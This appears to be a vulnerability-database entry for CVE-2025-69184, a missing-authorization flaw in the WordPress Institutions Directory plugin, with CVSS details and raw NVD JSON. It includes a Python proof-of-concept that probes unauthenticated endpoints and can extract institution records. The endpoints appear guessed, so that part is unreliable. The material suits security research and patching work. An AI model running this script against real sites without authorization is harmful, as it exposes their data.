Security Vulnerability Report
中文
CVE-2025-69184 CVSS 7.3 HIGH

CVE-2025-69184

Published: 2026-01-22 17:16:25
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in e-plugins Institutions Directory institutions-directory allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Institutions Directory: from n/a through <= 1.3.4.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Institutions Directory插件 <= 1.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69184 PoC - Missing Authorization in Institutions Directory # Affected: WordPress Institutions Directory Plugin <= 1.3.4 import requests import sys TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-69184""" # Common API endpoints for Institutions Directory plugin endpoints = [ "/wp-json/institutions-directory/v1/institutions", "/wp-json/institutions-directory/v1/institutions/list", "/wp-admin/admin-ajax.php?action=get_institutions", "/wp-admin/admin-ajax.php?action=institutions_directory_get_all" ] print("[*] Testing CVE-2025-69184 - Missing Authorization") print(f"[*] Target: {TARGET_URL}") for endpoint in endpoints: url = TARGET_URL + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) print(f"\n[>] Testing endpoint: {endpoint}") print(f" Status Code: {response.status_code}") # Check if we get data without authentication if response.status_code == 200: try: data = response.json() if data: print(f" [!] VULNERABLE - Received data without authentication") print(f" Data preview: {str(data)[:200]}...") return True except: pass elif response.status_code == 401 or response.status_code == 403: print(f" [+] Protected - Authentication required") except requests.exceptions.RequestException as e: print(f" [!] Error: {e}") print("\n[*] Vulnerability check complete") return False def exploit_data_exposure(): """Attempt to exploit the vulnerability for data exposure""" url = TARGET_URL + "/wp-json/institutions-directory/v1/institutions" print("\n[*] Attempting to extract institution data...") response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: try: data = response.json() print(f"[+] Successfully retrieved {len(data)} institution records") for item in data[:5]: # Show first 5 records print(f" - {item}") except: print(f"[+] Received response: {response.text[:500]}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] is_vulnerable = check_vulnerability() if is_vulnerable: print("\n[!] Target appears to be VULNERABLE to CVE-2025-69184") print("[!] Recommendation: Update Institutions Directory plugin to version 1.3.5 or later") # Uncomment to automatically extract data: # exploit_data_exposure() else: print("\n[+] Target does not appear to be vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69184", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:24.980", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in e-plugins Institutions Directory institutions-directory allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Institutions Directory: from n/a through <= 1.3.4."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en e-plugins Institutions Directory institutions-directory permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Institutions Directory: desde n/a hasta &lt;= 1.3.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/institutions-directory/vulnerability/wordpress-institutions-directory-plugin-1-3-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}